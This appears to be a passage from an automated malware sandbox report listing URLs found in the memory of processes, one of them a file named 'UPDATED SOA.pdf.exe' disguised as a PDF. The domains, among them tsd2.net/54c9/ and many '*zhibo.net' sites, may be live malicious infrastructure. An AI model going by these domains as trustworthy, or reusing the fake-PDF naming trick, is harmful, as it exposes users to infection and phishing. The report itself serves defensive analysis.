                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.js
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/picture/anva-zilv.png
                Source: S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/picture/default_avatar.jpg
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.png
                Source: S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.png
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chouyinzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chunlangzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chunyanzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cryptico.net/binding
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cuiluanzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cyberpolice.cn
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.djpaul.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.doudouzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.douquzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.douzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.duoxiuzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expovirtual.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.fengxiuzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.finesttravel.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.firstdial.net
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.gesichtspflege.net
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.humanhouse.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.huoyazhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.huoyingzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.inmoto.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.investimo.net
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.juwe.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.kingdomcity.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.leatherfactory.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lianaizhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liansezhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.linglingzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liuhuazhibo.com
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liuyuezhibo.com
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.liuyuezhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.losbravos.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.lovevintage.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mamaizhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.manchengzhibo.com
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.meijiuzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.meikazhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mengxinzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.miaosuzhibo.com
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mijianzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mituzhibo.com
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.moidom.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.momozhibo.net
                Source: S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.monitorit.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mydowntown.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mynewshub.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.nuoxiazhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oshwal.net/binding
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qinglizhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qingsezhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qiushuizhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.ridebox.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.riscon.net
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.sarfa.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.seyingzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.sleepmaster.net/binding
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.solarfreedom.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.startshere.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.summergames.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.taoezhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.testoprime.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thecakelady.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thecherrytree.net
                Source: S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.tinygiant.net
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: S1OoUcW6nwo.exe, 00000013.00000002.4145886666.0000000005808000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tsd2.net
                Source: S1OoUcW6nwo.exe, 00000013.00000002.4145886666.0000000005808000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tsd2.net/54c9/
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.twistedlemon.net/binding
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wangyouzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.winegard.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuhaozhibo.com
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wunvzhibo.net
